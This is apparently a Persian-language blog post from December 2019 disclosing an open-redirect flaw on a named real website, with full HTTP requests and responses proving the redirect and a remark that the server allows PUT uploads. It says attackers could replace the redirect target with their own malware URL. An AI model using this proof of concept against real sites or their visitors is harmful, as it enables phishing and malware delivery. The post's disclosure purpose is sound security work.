:/redirect?c=f57cf9bb8e90d2b426cb&id=42671&u=پارامتر u آسیب پذیر بوده و هنگامی که مقدار آن را بصورت (بعنوان مثال) زیر قرار میدهیم :www.google.comبه آدرس google.com منتقل میشود. اکنون www.google.com میتواند با آدرس بدافزار ما جایگزین شود.ابتدا درخواستی به سمت صفحه نخست وبسایت ارسال میکنیم :GET / HTTP/1.1 Host: farsi.khamenei.ir Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: __utmz=4503204.1576828573.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=4503204.1770042313.1576828573.1576828573.1576851880.2; __utmc=4503204; JSESSIONID=BE90F65D9AF02814604E9309B5F43C54 Connection: closeخب حالا Response که برای ما برمیگردد بصورت زیر است :HTTP/1.1 200 OK Date: Fri, 20 Dec 2019 16:15:02 GMT Server: Apache-Coyote/1.1 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN X-Content-Type-Options: nosniff Cache-Control: private, max-age=180 Accept-Ranges: bytes ETag: W/&quot96431-1576788177000&quot Last-Modified: Thu, 19 Dec 2019 20:42:57 GMT Content-Type: text/html;charset=UTF-8 Access-Control-Allow-Origin: * Content-Secure-Policy: default-src 'none'; script-src 'self' www.google-analytics.com ajax.googleapis.com; img-src *; style-src 'self'; Vary: Accept-Encoding Content-Length: 96431 Connection: closeخب مشاهده میکنید که روال عادی هستش.حالا به url آسیب پذیر یک درخاستی ارسال میکنیم :GET /redirect?c=f57cf9bb8e90d2b426cb&id=42671&u=//www.google.com HTTP/1.1 Host: farsi.khamenei.ir Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: __utmz=4503204.1576828573.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=4503204.1770042313.1576828573.1576828573.1576851880.2; __utmc=4503204; JSESSIONID=BE90F65D9AF02814604E9309B5F43C54 Connection: closeاکنون Response دریافتی ما متفاوت خواهد بود :HTTP/1.1 302 Found Date: Fri, 20 Dec 2019 16:18:40 GMT Server: Apache-Coyote/1.1 x-xss-protection: 1; mode=block x-frame-options: SAMEORIGIN X-Content-Type-Options: nosniff Cache-Control: private, max-age=180 Location: http://www.google.com Content-Type: text/html;charset=UTF-8 Set-Cookie: JSESSIONID=F9ED1D537E1A4AD68FBE79E8CB3C75C7; Path=/; HttpOnly Access-Control-Allow-Origin: * Content-Secure-Policy: default-src 'none'; script-src 'self' www.google-analytics.com ajax.googleapis.com; img-src *; style-src 'self'; Vary: Accept-Encoding Content-Length: 0 Connection: closeپس آسیب پذیری مان در حالت کلی درست هست و بنابراین میتوانیم برروی مرورگر نیز این موضوع را امتحان کنیم.معمولا نفوذگران دو هدف کلی برای این آسیب پذیری را دارند :۱) هدایت کاربران به سمت URL های آلوده۲) هدایت کاربران به سمت بدافزار خودشان جهت آپلود در سیستم قربانیبنده دو demo آماده کرده ام که میتوانید دریافت و مشاهده نمایید :دمو شماره یکدمو شماره دولینک ویدیو یوتیوببررسی سمت سرور از لحاظ امنیتی :هدف اصلی ما در این مقاله بررسی این موضوع بود که چطور میتوان از طریق آسیب پذیری که در سایت قرار دارد بتوان به بازدیدکننده های وبسایت حمله سایبری ایجاد کرد. البته انجام اینکار برای اینکه خروجی مطلوبی داشته باشد نیازمند سازماندهی کردن هست و بعنوان مثال بایستی از روش های مختلف Social Engineering در ابعاد بزرگ نیز بهره گرفت. اما سرور سایت نیز دارای آسیب پذیری هست و امن نیست.همانطور که در تصویر بالا مشاهده میکنید Put Method روی Webserver درحال فعال هست و وجود این متد در وب سرور باعث میشود نفوذگر بدافزارهای خود را برروی سرور هدف بارگزاری کند. اینکار نیز روش های خاص خود را دارد که ما در این مقاله به این موضوع نمیپردازیم.حرف های پایانی :بهره گیری از آسیب پذیری ها نیازمند این است که از جنبه های مختلف به یک هدف و آسیب پذیری نگاه کنیم.حملات Client Side برای اهداف مختلف میتوانند استفاده شوند بعنوان مثال میتوان از کاربران بعنوان زامبی استفاده کرد و در راستای اهداف شوم از آنان سوءاستفاده کرد بنابراین داشتن طرز فکر مناسب در این حوزه و نگاه به جنبه های متفاوت یک حرکت و آسیب پذیری میتواند خیلی موثر باشد.هدف بنده از به اشتراک گذاری این موضوع اینست که امیدوارم به سمع و نظر پشتیبانی وبسایت برسد و این آسیب پذیری که میتواند بصورت سازماندهی شده مورد سوءاستفاده قرار بگیرد نیز برطرف گردد.یاعلی مدد کیوان رضازاده اقدم کیوان رضازاده اقدم Fri, 20 Dec 2019 19:10:06 +0330